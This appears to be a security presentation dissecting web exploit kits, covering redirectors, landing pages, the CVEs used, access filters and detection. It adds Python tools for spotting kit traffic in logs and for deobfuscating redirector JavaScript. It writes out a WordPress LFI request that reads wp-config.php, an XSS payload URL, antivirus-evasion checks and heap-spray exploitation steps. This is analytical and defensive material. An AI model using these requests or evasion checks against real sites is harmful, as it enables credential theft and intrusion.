Anatomy of Exploit Kits
Sameer Patil
(sameerpatilms@gmail.com)
SecurityXploded

Content
• Exploit Kit Introduction
• Phases
• Exploits used
• Access Filters
• Detection
• Analysis of exploits

Exploit Kits
• Fiesta
• FlashPack
• Magnitude
• Rig
• Nuclear
• Angler
• Sweet Orange
• Neutrino

Exploit Kit Naming

Phases
• Compromised site
• Redirector
• Landing page
• Post-infection traffic
Compromised sites
• LFI in the RevSlider plugin for WordPress (reads wp-config.php, which holds the site's database credentials):
  http://[compromised.com]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
• XSS in the Simple Security WordPress plugin (CVE-2014-9570):
  http://[compromised.com]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/HACKED/%29;%3C/script%3E
• Drupal SQL injection
• CDN reference compromise (e.g. Operation Poisoned Helmand)
• Iframe injectors
Compromised sites (examples)
• www.soyentrepreneur.com/assets/js/funcionesCarga.js
• www.media.orpi.com/js/scripts.js

Redirector (Obfuscated)
Redirector (after deobfuscating)
• It checks whether the Silverlight plugin is installed by instantiating the Silverlight ActiveX control through its ProgID:
  ActiveXObject("AgControl.AgControl")
• The presence of the Flash plugin is checked by embedding a SWF through SWFObject:
  swfobject.embedSWF()
• Antivirus detection: chavs() tests for driver files shipped by Kaspersky (kl1.sys) and Trend Micro (tm*.sys) products and exits without redirecting if any is present, so protected or instrumented machines never see the landing page. Kits commonly implement the file probe with the Microsoft.XMLDOM file-existence disclosure (CVE-2013-7331, listed under IE on the Exploits used slide):
  if( chavs("kl1.sys") || chavs("tmciesc.sys") || chavs("tmtdi.sys") ||
      chavs("tmactmon.sys") || chavs("TMEBC32.sys") ||
      chavs("tmeext.sys") || chavs("tmconn.sys") ||
      chavs("tmevtmgr.sys") ) { exit(); }

Landing Page
• Downloads the malicious files from http://jxlpa.ianlar.in

Post-Infection
• Banking frauds
• Spying
• Information stealing
• Click fraud activities

Exploits used
• IE: CVE-2014-0322 (zero day), CVE-2014-0324 (zero day), CVE-2014-6332, CVE-2013-2551, CVE-2013-3918, CVE-2013-7331
• Java: CVE-2013-2460, CVE-2013-2465, CVE-2012-1723, CVE-2012-0507, CVE-2013-0422 (zero day)
• Flash: CVE-2014-8440, CVE-2014-0556, CVE-2014-0569, CVE-2014-0515, CVE-2014-8439, CVE-2014-0502 (zero day), CVE-2015-???? (zero day)
• Silverlight: CVE-2013-0074, CVE-2013-3896
• PDF: CVE-2010-0188

Access Filters
The kit checks each request before serving the landing page; traffic that fails a filter is turned away, which is also why replaying a captured chain by hand often yields nothing:
• Requests with no Referer (a direct visit rather than a redirect from a compromised site)
• Blocked IP addresses
• Non-Windows traffic
• User-Agent checks
• Plugin-detect scripts
• URL blacklist checks

Detection
• Obfuscation in JS
• Signatures for specific CVEs
• User-Agent strings
• URL patterns (req= selects the payload type: swf is a Flash file, xap a Silverlight package; note the misspelled PHPSSESID, a useful signature in itself):
  <domain>/index.php?req=mp3&num=37&PHPSSESID=
  <domain>/index.php?req=swf&num=8413&PHPSSESID=
  <domain>/index.php?req=xap&PHPSSESID=
  <domain>/1.php?r
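Added example (not from the slides): a Python pass over web-server access logs in Combined Log Format that flags both kinds of URL shown in this deck, the attacks against the compromised WordPress site from the Compromised sites slide (RevSlider LFI, Simple Security XSS) and the landing-page and payload request shapes listed above. The log lines, the addresses and the PHPSSESID value are constructed for the example; the rule names are mine.

```python
"""Flag exploit-kit indicators in Combined Log Format access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# host ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'\.\.[/\\]|%2e%2e%2f', re.I)
SCRIPT_TAG = re.compile(r'<\s*script|javascript:|\bon\w+\s*=', re.I)


def parse_line(line):
    """Split one log line into fields; query parameters are decoded twice so
    double-encoded payloads (%253C -> %3C -> <) do not slip past the rules."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    rec["script"] = url.path
    rec["params"] = {k: [unquote(v) for v in vs]
                     for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    return rec


def compromise_attempt(rec):
    """Attacks on the WordPress site itself (Compromised sites slide)."""
    p, script = rec["params"], rec["script"]
    if (script.endswith("/wp-admin/admin-ajax.php")
            and p.get("action") == ["revslider_show_image"]
            and any(TRAVERSAL.search(v) for v in p.get("img", []))):
        return "revslider-lfi"
    if (script.endswith("/wp-admin/users.php")
            and p.get("page") == ["access_log"]
            and any(SCRIPT_TAG.search(v) for v in p.get("datefilter", []))):
        return "simple-security-xss"
    return None


def ek_url_pattern(rec):
    """Landing-page / payload request shapes (Detection slide)."""
    p, script = rec["params"], rec["script"]
    if script.endswith("/index.php") and "PHPSSESID" in p:
        req = p.get("req", [""])[0]
        if req in ("mp3", "swf", "xap"):
            return "ek-payload-" + req
    if script.endswith("/1.php") and "r" in p:
        return "ek-gate"
    return None


def scan(lines):
    """Return (client ip, rule, request path) for every line that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rule = compromise_attempt(rec) or ek_url_pattern(rec)
        if rule:
            hits.append((rec["ip"], rule, rec["path"]))
    return hits


# Constructed sample: two WordPress exploitation attempts, one Flash payload
# fetch plus gate check, and two benign requests that must not fire.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2015:10:01:09 +0000] "GET /wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/HACKED/%29;%3C/script%3E HTTP/1.1" 200 811 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2015:10:02:15 +0000] "GET /index.php?req=swf&num=8413&PHPSSESID=oWHiBzZbxyq HTTP/1.1" 200 58213 "http://compromised.example/" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
198.51.100.4 - - [10/Jan/2015:10:02:17 +0000] "GET /1.php?r HTTP/1.1" 200 332 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
192.0.2.33 - - [10/Jan/2015:10:03:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4101 "-" "Mozilla/5.0"
192.0.2.34 - - [10/Jan/2015:10:03:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/banner.jpg HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, rule, path in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip:15} {rule:22} {path}")
```

Feed `open(path)` to `scan()` to run it on a real log. The kit rotates the `num=` and session values per request, so the URL rules deliberately ignore them and key on the static parts (`req=`, `PHPSSESID`, `1.php?r`); on a site that legitimately uses `index.php?req=` they should be tightened with the Referer and User-Agent fields the parser already exposes.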

Demo
• Java exploit: CVE-2013-2465
• JavaScript deobfuscation
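Added example (not the deck's code) covering the JavaScript deobfuscation demo and the redirector slide above: a Python pass that undoes the string-level tricks exploit-kit redirectors lean on (\xHH and \uHHHH escapes, String.fromCharCode, literal concatenation) and then lists the ProgIDs, driver names and URLs that fall out. The script it runs on is constructed to mirror the redirector slide; gate.example is a placeholder and chavs() stands for the kit's own file-probe helper. Real samples add layers this does not touch (eval of assembled code, packers, array-index lookups), so treat it as the first pass before stepping through the rest in a JS engine.

```python
"""String-level JavaScript deobfuscation for exploit-kit redirectors (added example)."""
import re

# "..." or '...' literal with escapes allowed inside; group 1 / group 2 is the body
STR_ANY = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'', re.S)
STR_DQ = re.compile(r'"((?:\\.|[^"\\])*)"', re.S)
FROMCHARCODE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]*?)\s*\)')
ESCAPE = re.compile(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)', re.S)
SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def decode_literal(body):
    """Turn the body of a JS string literal into the text it denotes."""
    def one(m):
        e = m.group(1)
        if e[0] in "xu" and len(e) > 1:
            return chr(int(e[1:], 16))
        return SIMPLE_ESCAPES.get(e, e)          # \" -> ", \\ -> \, \/ -> /
    return ESCAPE.sub(one, body)


def js_quote(text):
    """Re-emit text as a double-quoted JS literal."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def inline_fromcharcode(js):
    """String.fromCharCode(104, 116, ...) -> "ht..." """
    def one(m):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return js_quote("".join(map(chr, codes)))
    return FROMCHARCODE.sub(one, js)


def normalize_strings(js):
    """Decode hex, unicode and simple escapes in every literal; re-emit it double-quoted."""
    def one(m):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        return js_quote(decode_literal(body))
    return STR_ANY.sub(one, js)


def fold_concats(js):
    """Merge runs of "a" + "b" + "c" into "abc" (expects normalize_strings to have run)."""
    lits = list(STR_DQ.finditer(js))
    out, pos, i = [], 0, 0
    while i < len(lits):
        start, end, body = lits[i].start(), lits[i].end(), lits[i].group(1)
        j = i + 1
        # only a bare '+' may sit between two literals for them to be one string
        while j < len(lits) and re.fullmatch(r"\s*\+\s*", js[end:lits[j].start()]):
            body += lits[j].group(1)
            end = lits[j].end()
            j += 1
        out.append(js[pos:start])
        out.append('"' + body + '"')
        pos, i = end, j
    out.append(js[pos:])
    return "".join(out)


def deobfuscate(js):
    return fold_concats(normalize_strings(inline_fromcharcode(js)))


def indicators(js):
    """Pull the things an analyst wants out of the cleaned script."""
    clean = deobfuscate(js)
    strings = [decode_literal(m.group(1)) for m in STR_DQ.finditer(clean)]
    return {
        "activex": sorted(set(re.findall(r'ActiveXObject\(\s*"([^"]+)"', clean))),
        "drivers": sorted({s for s in strings if s.lower().endswith(".sys")}),
        "urls": sorted(set(re.findall(r'https?://[^\s"\'<>\\]+', clean))),
    }


# Constructed sample modelled on the redirector slide; not the deck's script.
# gate.example is a placeholder, chavs() is the kit's own file-probe helper.
SAMPLE_JS = r'''var sl = 0;
try { new ActiveXObject("\x41\x67\x43\x6f\x6e\x74\x72\x6f\x6c" + "." + String.fromCharCode(65, 103, 67, 111, 110, 116, 114, 111, 108)); sl = 1; } catch (e) {}
if (chavs("\x6b\x6c\x31\x2e\x73\x79\x73") || chavs(String.fromCharCode(116, 109, 116, 100, 105, 46, 115, 121, 115))) { exit(); }
document.write("<iframe src=\"" + "\x68\x74\x74\x70\x3a\x2f\x2f" + 'gate.example' + "/1.php?r" + "\" width=" + sl + " height=1></iframe>");
'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
    print(indicators(SAMPLE_JS))
```

The three passes are ordered on purpose: fromCharCode calls become literals first, every literal is then decoded and re-quoted the same way, and only then are adjacent literals folded, so a `+` that joins a literal to a variable (the `sl` flag in the sample) is left alone instead of being mangled.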

Flash Exploit CVE-2014-0515
• Vector<int> arrays of size 0x90 bytes are allocated
• The vectors are resized to 0, leaving holes between the vector objects
• The vulnerability (the Pixel Bender bug, see the PixelBender reference) is triggered, corrupting heap memory next to the vectors
• FileReference objects are sprayed into the holes
• The FileReference object's function pointer table is modified
• cancel() is called, which now dispatches to VirtualProtect() and makes the attacker's payload executable (defeating DEP)

Vector<int> object memory layout (source: HP Security Blog)

DPBG tool

References
• CVE-2013-2465 Java Exploit
• Java obfuscators
• PixelBender Exploit
• Malware don't need Coffee
• Malware Traffic Analysis

Thank You
